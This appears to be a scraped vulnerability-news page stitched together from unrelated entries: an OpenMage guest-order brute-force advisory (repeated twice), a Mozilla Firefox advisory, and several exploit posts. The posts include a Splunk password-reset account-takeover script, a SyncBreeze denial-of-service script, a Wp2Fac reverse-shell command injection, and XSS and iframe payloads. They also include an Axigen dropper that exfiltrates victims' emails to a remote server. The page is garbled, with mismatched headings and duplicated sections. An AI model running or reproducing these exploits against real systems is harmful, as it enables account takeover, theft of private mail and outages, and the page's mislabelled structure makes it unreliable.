Improper encoding or escaping of output in Wing FTP Server (User Web Client) allows Cross-Site Scripting (XSS).This issue affects Wing FTP Server: <= 7.2.0.



CVE-2023-37875: Wing FTP Server History

# Impact

Guest orders may be viewed without authentication using a "guest-view" cookie which contains the order's "protect_code". This code is 6 hexadecimal characters which is arguably not enough to prevent a brute-force attack. Exposing each order would require a separate brute force attack.

# Patches

None.

# Workarounds

Implementing rate-limiting at the web server would help mitigate the issue. In particular, a very strict rate limit (e.g. 1 per minute per IP) for the specific route (`sales/guest/view/`) would effectively mitigate the issue.

# References

Email from Frank Rochlitzer (f.rochlitzer@b3-it.de) to security@openmage.org:

## Summary

The German Federal Office for Information Security (BSI) found the following flaw in OpenMage through a commissioned pen test:
The web application was found to accept certain requests even without prior strong authentication if the person making the request has data that is non-public but also not secret, such as easily
easily guessed transaction numbers or names.
Attacking entities could possibly exploit this to retrieve sensitive information using this easier-to-obtain data and by trying random numbers.

## Details

Customers who place an order without an account can subsequently retrieve the order data or invoice data by specifying individual information.
Technically, the access is realized by specifying the cookie guest-view. The value of the cookie is Base64 encoded and contains a random value and the order number. The random value consists of six characters, where these are taken from the alphabet [0-9a-f]. In the best case, i.e. when using a cryptographically secure random number generator, this corresponds to an entropy of 24 bits. Furthermore, the order numbers are assigned incrementally, so that the number range can be narrowed down or an upper limit determined by placing an order.
Specifically, this results in the risk that an attacking entity can iterate over all possible values of the cookie's random value. If successful, the billing address, shipping address, payment details and the ordered items can be viewed. The attack only works for orders made as a guest.

## PoC

The request/response pair shows the retrieval of an order. It should be noted in particular, that the cookie is not bound to a session. The response has been formatted for formatted for readability.

Request:
```
1 GET /magento19/index.php/default/sales/guest/view/ HTTP/1.1
2 Host: localhost.local
3 Cookie: guest-view=MzYyYzI4OjEwMDAwMDQzMQ%3D%3D;
4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 Accept-Language: en-US,en;q=0.5
7 Accept-Encoding: gzip, deflate
8 Referer: https://localhost.local/magento19/index.php/default/egovs_checkout/multipage/successview/
9 Upgrade-Insecure-Requests: 1
10 Sec-Fetch-Dest: document
11 Sec-Fetch-Mode: navigate
12 Sec-Fetch-Site: same-origin
13 Sec-Fetch-User: ?1
14 Te: trailers
15 Connection: close
```

Response:

```
1 HTTP/1.1 200 OK
2 Date: Tue, 13 Dec 2022 14:06:13 GMT
3 Server: Apache
4 Strict-Transport-Security: max-age=31536000; includeSubDomains
5 X-Powered-By: PHP/7.4.6
6 Set-Cookie: om_frontend=id7v84a05u8mm1j32t2kj5rbjl; expires=Tue, 13-Dec-2022 15:06:13 GMT; Max-Age=3600; path=/magento19/; domain=localhost.local; secure; HttpOnly
7 Expires: Thu, 19 Nov 1981 08:52:00 GMT
8 Cache-Control: no-store, no-cache, must-revalidate
9 Pragma: no-cache
10 Set-Cookie: om_frontend=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/magento19/; domain=localhost.local; secure; HttpOnly; SameSite=None
11 Set-Cookie: om_frontend=o42vttknheaj0sr3q0381jipdp; expires=Tue, 13-Dec-2022 15:06:13 GMT; Max-Age=3600; path=/magento19/; domain=localhost.local; secure; HttpOnly
12 Set-Cookie: guest-view=MzYyYzI4OjEwMDAwMDQzMQ%3D%3D; expires=Tue, 13-Dec-2022 14:16:13 GMT; Max-Age=600; path=/; domain=localhost.local; secure; HttpOnly; SameSite=None
13 X-Frame-Options: SAMEORIGIN
14 X-Content-Type-Options: nosniff
15 X-XSS-Protection: 1; mode=block
16 Referrer-Policy: same-origin
17 Feature-Policy: geolocation 'self'; vibrate 'none'
18 Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-inline' 'unsafeeval';
style-src 'self' 'unsafe-inline';
19 Connection: close
20 Content-Type: text/html; charset=UTF-8
21 Content-Length: 47876
22
23 <!DOCTYPE html>
24 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
25 […]
26 <div class="page-title">
27 <h1>Bestellung #100000431 - Ausstehende Überweisung</h1>
28 </div>
29 […]
30 <h2 class="feature-headline">Versandadresse</h2>
31 <div class="feature-content">
32 <address>
33 Herr Vorname Nachname<br>
34 Straße<br>
35 Dresden, Brandenburg, 01067<br>
36 Deutschland<br>
37 </address>
38 </div>
39 […]
40 <h2 class="feature-headline">Rechnungsadresse</h2>
41 <div class="feature-content">
42 <address>
43 [color]Herr Vorname Nachname<br>
44 Straße<br>
45 Dresden, Brandenburg, 01067<br>
46 Deutschland<br>[/color]
47 </address>
48 </div>
49 […]
50 <h2 class="feature-headline">Zahlungsart</h2>
51 <div class="feature-content">
52 <div class="block-content">
53 Vorkasse<br>
54 <div id="bankpayment_account_info" style="font-style: italic;">Bankverbindung</div>
55 <table class="data-table fieldset">
56 […]
57 <h2 class="sub-title">
58 <span>Kassenzeichen: WS1712000349</span>
59 </h2>
60 <h2 class="sub-title">Bestellte Artikel</h2>
61 […]
62 <td class="order-item-product">
63 <h3 class="product-name ellipsis-multi-line">Testprodukt Kreditkarte</h3>
64 […]
65 <span class="price">100,23 €</span>
66 […]
67 </html>
```

## Impact

Information disclosure.
Read as well as write access to sensitive information of persons or accounts and the execution of actions on their behalf must always be secured by strong authentication. This can be ensured, for example, by enforcing strong passwords or MFA.
For temporary accesses to sensitive information, temporary passwords or
authentication tokens or comparable data that an attacking entity cannot easily guess or determine should be used. Random values should have sufficient entropy so that searching the number space is impractical for attacking entities.
Furthermore, such queries should be limited by rate limiting.
The exact attack effort cannot be determined, since this requires the proportion of
the proportion of orders that were placed without an account and since the performance of the
performance of the production system is likely to differ from that of the test system.
In a test run, 1000 requests could be made within 36 seconds. Part of the execution is shown in the screenshot. The complete search of the number space for the random value would take 6 days 23 hours 46 minutes. Accordingly, the expected value is about 3.5 days. If every third order is executed without an account, the effort must be multiplied by a factor of 3.

Mit freundlichen Grüßen

Frank Rochlitzer (github: theroch)


**Impact**

Guest orders may be viewed without authentication using a "guest-view" cookie which contains the order's "protect\_code". This code is 6 hexadecimal characters which is arguably not enough to prevent a brute-force attack. Exposing each order would require a separate brute force attack.

**Patches**

None.

**Workarounds**

Implementing rate-limiting at the web server would help mitigate the issue. In particular, a very strict rate limit (e.g. 1 per minute per IP) for the specific route (sales/guest/view/) would effectively mitigate the issue.

**References**

Email from Frank Rochlitzer (f.rochlitzer@b3-it.de) to security@openmage.org:

**Summary**

The German Federal Office for Information Security (BSI) found the following flaw in OpenMage through a commissioned pen test:  
The web application was found to accept certain requests even without prior strong authentication if the person making the request has data that is non-public but also not secret, such as easily  
easily guessed transaction numbers or names.  
Attacking entities could possibly exploit this to retrieve sensitive information using this easier-to-obtain data and by trying random numbers.

**Details**

Customers who place an order without an account can subsequently retrieve the order data or invoice data by specifying individual information.  
Technically, the access is realized by specifying the cookie guest-view. The value of the cookie is Base64 encoded and contains a random value and the order number. The random value consists of six characters, where these are taken from the alphabet \[0-9a-f\]. In the best case, i.e. when using a cryptographically secure random number generator, this corresponds to an entropy of 24 bits. Furthermore, the order numbers are assigned incrementally, so that the number range can be narrowed down or an upper limit determined by placing an order.  
Specifically, this results in the risk that an attacking entity can iterate over all possible values of the cookie's random value. If successful, the billing address, shipping address, payment details and the ordered items can be viewed. The attack only works for orders made as a guest.

**PoC**

The request/response pair shows the retrieval of an order. It should be noted in particular, that the cookie is not bound to a session. The response has been formatted for formatted for readability.

Request:

    1 GET /magento19/index.php/default/sales/guest/view/ HTTP/1.1
    2 Host: localhost.local
    3 Cookie: guest-view=MzYyYzI4OjEwMDAwMDQzMQ%3D%3D;
    4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    6 Accept-Language: en-US,en;q=0.5
    7 Accept-Encoding: gzip, deflate
    8 Referer: https://localhost.local/magento19/index.php/default/egovs_checkout/multipage/successview/
    9 Upgrade-Insecure-Requests: 1
    10 Sec-Fetch-Dest: document
    11 Sec-Fetch-Mode: navigate
    12 Sec-Fetch-Site: same-origin
    13 Sec-Fetch-User: ?1
    14 Te: trailers
    15 Connection: close
    

Response:

    1 HTTP/1.1 200 OK
    2 Date: Tue, 13 Dec 2022 14:06:13 GMT
    3 Server: Apache
    4 Strict-Transport-Security: max-age=31536000; includeSubDomains
    5 X-Powered-By: PHP/7.4.6
    6 Set-Cookie: om_frontend=id7v84a05u8mm1j32t2kj5rbjl; expires=Tue, 13-Dec-2022 15:06:13 GMT; Max-Age=3600; path=/magento19/; domain=localhost.local; secure; HttpOnly
    7 Expires: Thu, 19 Nov 1981 08:52:00 GMT
    8 Cache-Control: no-store, no-cache, must-revalidate
    9 Pragma: no-cache
    10 Set-Cookie: om_frontend=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/magento19/; domain=localhost.local; secure; HttpOnly; SameSite=None
    11 Set-Cookie: om_frontend=o42vttknheaj0sr3q0381jipdp; expires=Tue, 13-Dec-2022 15:06:13 GMT; Max-Age=3600; path=/magento19/; domain=localhost.local; secure; HttpOnly
    12 Set-Cookie: guest-view=MzYyYzI4OjEwMDAwMDQzMQ%3D%3D; expires=Tue, 13-Dec-2022 14:16:13 GMT; Max-Age=600; path=/; domain=localhost.local; secure; HttpOnly; SameSite=None
    13 X-Frame-Options: SAMEORIGIN
    14 X-Content-Type-Options: nosniff
    15 X-XSS-Protection: 1; mode=block
    16 Referrer-Policy: same-origin
    17 Feature-Policy: geolocation 'self'; vibrate 'none'
    18 Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-inline' 'unsafeeval';
    style-src 'self' 'unsafe-inline';
    19 Connection: close
    20 Content-Type: text/html; charset=UTF-8
    21 Content-Length: 47876
    22
    23 <!DOCTYPE html>
    24 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
    25 […]
    26 <div class="page-title">
    27 <h1>Bestellung #100000431 - Ausstehende Überweisung</h1>
    28 </div>
    29 […]
    30 <h2 class="feature-headline">Versandadresse</h2>
    31 <div class="feature-content">
    32 <address>
    33 Herr Vorname Nachname<br>
    34 Straße<br>
    35 Dresden, Brandenburg, 01067<br>
    36 Deutschland<br>
    37 </address>
    38 </div>
    39 […]
    40 <h2 class="feature-headline">Rechnungsadresse</h2>
    41 <div class="feature-content">
    42 <address>
    43 [color]Herr Vorname Nachname<br>
    44 Straße<br>
    45 Dresden, Brandenburg, 01067<br>
    46 Deutschland<br>[/color]
    47 </address>
    48 </div>
    49 […]
    50 <h2 class="feature-headline">Zahlungsart</h2>
    51 <div class="feature-content">
    52 <div class="block-content">
    53 Vorkasse<br>
    54 <div id="bankpayment_account_info" style="font-style: italic;">Bankverbindung</div>
    55 <table class="data-table fieldset">
    56 […]
    57 <h2 class="sub-title">
    58 <span>Kassenzeichen: WS1712000349</span>
    59 </h2>
    60 <h2 class="sub-title">Bestellte Artikel</h2>
    61 […]
    62 <td class="order-item-product">
    63 <h3 class="product-name ellipsis-multi-line">Testprodukt Kreditkarte</h3>
    64 […]
    65 <span class="price">100,23 €</span>
    66 […]
    67 </html>
    

**Impact**

Information disclosure.  
Read as well as write access to sensitive information of persons or accounts and the execution of actions on their behalf must always be secured by strong authentication. This can be ensured, for example, by enforcing strong passwords or MFA.  
For temporary accesses to sensitive information, temporary passwords or  
authentication tokens or comparable data that an attacking entity cannot easily guess or determine should be used. Random values should have sufficient entropy so that searching the number space is impractical for attacking entities.  
Furthermore, such queries should be limited by rate limiting.  
The exact attack effort cannot be determined, since this requires the proportion of  
the proportion of orders that were placed without an account and since the performance of the  
performance of the production system is likely to differ from that of the test system.  
In a test run, 1000 requests could be made within 36 seconds. Part of the execution is shown in the screenshot. The complete search of the number space for the random value would take 6 days 23 hours 46 minutes. Accordingly, the expected value is about 3.5 days. If every third order is executed without an account, the effort must be multiplied by a factor of 3.

Mit freundlichen Grüßen

Frank Rochlitzer (github: theroch)

**References**

*   GHSA-9358-cpvx-c2qp
*   OpenMage/magento-lts@2a2a2fb
*   OpenMage/magento-lts@31e74ac
*   https://github.com/OpenMage/magento-lts/releases/tag/v19.5.1
*   https://github.com/OpenMage/magento-lts/releases/tag/v20.1.1

GHSA-9358-cpvx-c2qp: Magento LTS's guest order "protect code" can be brute-forced too easily

Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14 allows low-privileged users who hold a role with edit_user capability assigned to it the ability to escalate their privileges to that of the admin user by providing specially crafted web requests.

    https://github.com/redwaysecurity/CVEs/blob/main/CVE-2023-32707/README.md#!/usr/bin/env python3## Splunk admin account take over exploit - CVE-2023-32707# Author: [Redway Security](https://twitter.com/redwaysec))# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)## Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.## Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.#import argparseimport requestsimport randomimport stringimport base64# ignore warningsimport urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# Parse command-line argumentsparser = argparse.ArgumentParser(description='Splunk Authentication')parser.add_argument('--host', required=True, help='Splunk host or IP address')parser.add_argument('--username', required=True, help='Splunk username')parser.add_argument('--password', required=True, help='Splunk password')parser.add_argument('--target-user', required=True, help='Target user')parser.add_argument('--force-exploit', action='store_true',help='Force exploit')args = parser.parse_args()# Splunk server settingssplunk_host = args.host.split(':')[0]splunk_username = args.usernamesplunk_password = args.passwordtarget_user = args.target_userforce_exploit = args.force_exploitsplunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"credentials = f"{splunk_username}:{splunk_password}"base64_credentials = base64.b64encode(credentials.encode()).decode()headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0','Authorization': f'Basic {base64_credentials}'}proxies = {# 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',# 'https': 'http://127.0.0.1:8080'}response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",headers=headers, proxies=proxies, verify=False)if response.status_code == 200:affected_versions = ['9.0.4', '8.2.10', '8.1.13']user = response.json()splunk_version = user['generator']['version']# This is not a good way to compare versions.# There is a range of versions that are affected by this CVE, but this is just a PoC# 8.1.0 to 8.1.13# 8.2.0 to 8.2.10# 9.0.0 to 9.0.4print(f"Detected Splunk version '{splunk_version}'")if any(splunk_version <= value for value in affected_versions) or force_exploit:user_capabilities = user['entry'][0]['content']['capabilities']if 'edit_user' in user_capabilities:print(f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")new_password = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))change_password_payload = {'password': new_password,'force-change-pass': 0,'locked-out': 0}response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",data=change_password_payload, headers=headers, proxies=proxies, verify=False)if response.status_code == 200:print(f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")else:print('Account takeover failed')else:print(f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")else:print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")else:print(f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")exit(1)

Splunk Enterprise Account Takeover

A buffer overflow vulnerability in OpenPLC Runtime's webserver version 3 allows attackers to inject malicious code, leading to an internal server error that is irrecoverable. This also disables the ability to add any new slave devices through the "Add Slave Devices" component on the Modbus page of the application.

OpenPLC Webserver 3 Denial Of Service / Buffer Overflow

IWT Imagine CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : IWT Imagineِ CMS v1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://imaginewebtech.com                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /photo-gallery.html?id=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1wwsanklechain/photo-gallery.html?id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

IWT Imagine CMS 1.0 Cross Site Scripting

When receiving rendering data over IPC `mStream` could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash. This vulnerability affects Firefox < 117, Firefox ESR < 102.15, Firefox ESR < 115.2, and Thunderbird < 115.2.

**Mozilla Foundation Security Advisory 2023-34**

Announced

August 29, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 117

**#CVE-2023-4573: Memory corruption in IPC CanvasTranslator**

Reporter

sonakkbi

Impact

high

**Description**

When receiving rendering data over IPC mStream could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846687

**#CVE-2023-4574: Memory corruption in IPC ColorPickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the Color Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846688

**#CVE-2023-4575: Memory corruption in IPC FilePickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the File Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846689

**#CVE-2023-4576: Integer Overflow in RecordedSourceSurfaceCreation**

Reporter

fffvr

Impact

high

**Description**

On Windows, an integer overflow could occur in RecordedSourceSurfaceCreation which resulted in a heap buffer overflow potentially leaking sensitive data that could have led to a sandbox escape.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1846694

**#CVE-2023-4577: Memory corruption in JIT UpdateRegExpStatics**

Reporter

Lukas Bernhard

Impact

high

**Description**

When UpdateRegExpStatics attempted to access initialStringHeap it could already have been garbage collected prior to entering the function, which could potentially have led to an exploitable crash.

**References**

*   Bug 1847397

**#CVE-2023-4578: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception**

Reporter

Irvan Kurniawan (@sourc7)

Impact

moderate

**Description**

When calling JS::CheckRegExpSyntax a Syntax Error could have been set which would end in calling convertToRuntimeErrorAndClear. A path in the function could attempt to allocate memory when none is available which would have caused a newly created Out of Memory exception to be mishandled as a Syntax Error.

**References**

*   Bug 1839007

**#CVE-2023-4579: Persisted search terms were formatted as URLs**

Reporter

Malte Jürgens

Impact

moderate

**Description**

Search queries in the default search engine could appear to have been the currently navigated URL if the search query itself was a well formed URL. This could have led to a site spoofing another if it had been maliciously set as the default search engine.

**References**

*   Bug 1842766

**#CVE-2023-4580: Push notifications saved to disk unencrypted**

Reporter

Harveer Singh

Impact

moderate

**Description**

Push notifications stored on disk in private browsing mode were not being encrypted potentially allowing the leak of sensitive information.

**References**

*   Bug 1843046

**#CVE-2023-4581: XLL file extensions were downloadable without warnings**

Reporter

Umar Farooq (@Puf)

Impact

moderate

**Description**

Excel .xll add-in files did not have a blocklist entry in Firefox's executable blocklist which allowed them to be downloaded without any warning of their potential harm.

**References**

*   Bug 1843758

**#CVE-2023-4582: Buffer Overflow in WebGL glGetProgramiv**

Reporter

Dohyun Lee (@l33d0hyun) of SSD-Disclosure Labs & DNSLab, Korea Univ.

Impact

low

**Description**

Due to large allocation checks in Angle for glsl shaders being too lenient a buffer overflow could have occured when allocating too much private shader memory on mac OS.  
_This bug only affects Firefox on macOS. Other operating systems are unaffected._

**References**

*   Bug 1773874

**#CVE-2023-4583: Browsing Context potentially not cleared when closing Private Window**

Reporter

Thejaka Maldeniya

Impact

low

**Description**

When checking if the Browsing Context had been discarded in HttpBaseChannel, if the load group was not available then it was assumed to have already been discarded which was not always the case for private channels after the private session had ended.

**References**

*   Bug 1842030

**#CVE-2023-4584: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2**

Reporter

Randell Jesup, Andrew McCreight, the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 102.14, Firefox ESR 115.1, Thunderbird 102.14, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2

**#CVE-2023-4585: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2**

Reporter

Donal Meehan, Sebastian Hengst, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 115.1, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

CVE-2023-4573: Security Vulnerabilities fixed in Firefox 117

SyncBreeze version 15.2.24 suffers from a denial of service vulnerability.

    # Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service# Date: 30/08/2023# Exploit Author: mohamed youssef# Vendor Homepage: https://www.syncbreeze.com/# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe# Version: 15.2.24# Tested on: windows 10 64-bitimport socketimport timepyload="username=admin&password="+'password='*500+""request=""request+="POST /login HTTP/1.1\r\n"request+="Host: 192.168.217.135\r\n"request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"request+="Accept-Language: en-US,en;q=0.5\r\n"request+="Accept-Encoding: gzip, deflate\r\n"request+="Content-Type: application/x-www-form-urlencoded\r\n"request+="Content-Length: "+str(len(pyload))+"\r\n"request+="Origin: http://192.168.217.135\r\n"request+="Connection: keep-alive\r\n"request+="Referer: http://192.168.217.135/login\r\n"request+="Upgrade-Insecure-Requests: 1\r\n"request+="\r\n"request+=pyloadprint (request)s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.217.135",80))s.send(request.encode())print (s.recv(1024))s.close()time.sleep(5)

SyncBreeze 15.2.24 Denial Of Service

Wp2Fac version 1.0 suffers from an OS command injection vulnerability.

    # Exploit Title: Wp2Fac v1.0 - OS Command Injection# Date: 2023-08-27# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://github.com/metinyesil/wp2fac# Tested on: Kali Linux & Windows 11# CVE: N/Aimport requestsdef send_post_request(host, revshell):    url = f'http://{host}/send.php'    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)Gecko/20100101 Firefox/102.0',        'Accept': '*/*',        'Accept-Language': 'en-US,en;q=0.5',        'Accept-Encoding': 'gzip, deflate',        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'X-Requested-With': 'XMLHttpRequest',        'Origin': f'http://{host}',        'Connection': 'close',        'Referer': f'http://{host}/',    }    data = {        'numara': f'1234567890 & {revshell} &;'    }    response = requests.post(url, headers=headers, data=data)    return response.texthost = input("Target IP: ")revshell = input("Reverse Shell Command: ")print("Check your listener!")send_post_request(host, revshell)

Wp2Fac 1.0 Command Injection

Axigen versions 10.5.0–4370c946 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS# Google Dork: inurl:passwordexpired=yes# Date: 2023-08-21# Exploit Author: AmirZargham# Vendor Homepage: https://www.axigen.com/# Software Link: https://www.axigen.com/mail-server/download/# Version: (10.5.0–4370c946) and older version of Axigen WebMail# Tested on: firefox,chrome# CVE: CVE-2022-31470ExploitWe use the second Reflected XSS to exploit this vulnerability, create amalicious link, and steal user emails.Dropper codeThis dropper code, loads and executes JavaScript exploit code from a remoteserver.');x = document.createElement('script');x.src = 'https://example.com/exploit.js';window.addEventListener('DOMContentLoaded',function y(){  document.body.appendChild(x)})//Encoded form/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//Exploit codexhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = newXMLHttpRequest();oob_server = 'https://example.com/';var script_tag = document.createElement('script');xhr1.open('GET', '/', true);xhr1.onreadystatechange = () => {    if (xhr1.readyState === XMLHttpRequest.DONE) {        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,true);        xhr2.setRequestHeader('Content-Type', 'application/json');        xhr2.onreadystatechange = () => {            if (xhr2.readyState === XMLHttpRequest.DONE) {                if (xhr2.status === 401){                    script_tag.src =`${oob_server}?status=session_expired&domain=${document.domain}`;                    document.body.appendChild(script_tag);                } else {                    resp = xhr2.responseText;                    folderId = JSON.parse(resp)["mails"][0]["folderId"];                    xhr3.open('GET',`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);                    xhr3.onreadystatechange = () => {                        if (xhr3.readyState === XMLHttpRequest.DONE) {                            emails = xhr3.responseText;                            script_tag.src =`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;                            document.body.appendChild(script_tag);                        }                    };                    xhr3.send();                }            }        };        var body = JSON.stringify({isUnread: false});        xhr2.send(body);    }};xhr1.send();Combining dropper and exploitYou can host the exploit code somewhere and then address it in the droppercode.

Axigen 10.5.0–4370c946 Cross Site Scripting

WordPress Elementor plugin versions prior to 3.5.5 suffer from an iframe injection vulnerability.

    # Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection# Date: 28.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://elementor.com/# Version: < 3.5.5# Tested on: Google and Firefox latest version# CVE : CVE-2022-4953# 1. DescriptionThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.# 2. Proof of Concept (PoC)Proof of Concept:https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

Tag

#firefox